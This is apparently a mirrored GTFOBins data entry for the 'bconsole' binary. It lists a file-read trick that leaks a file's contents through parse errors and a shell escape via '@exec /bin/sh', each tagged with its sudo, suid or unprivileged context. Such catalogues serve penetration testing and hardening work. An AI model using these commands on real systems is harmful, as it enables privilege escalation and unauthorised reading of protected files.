mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-03-07 06:31:33 +01:00
20 lines
352 B
Plaintext
20 lines
352 B
Plaintext
---
|
|
functions:
|
|
file-read:
|
|
- code: |-
|
|
bconsole -c /path/to/file-input
|
|
comment: |-
|
|
The file is actually parsed and the first wrong line is returned in an error message.
|
|
contexts:
|
|
sudo:
|
|
suid:
|
|
unprivileged:
|
|
shell:
|
|
- code: |-
|
|
bconsole
|
|
@exec /bin/sh
|
|
contexts:
|
|
sudo:
|
|
unprivileged:
|
|
...
|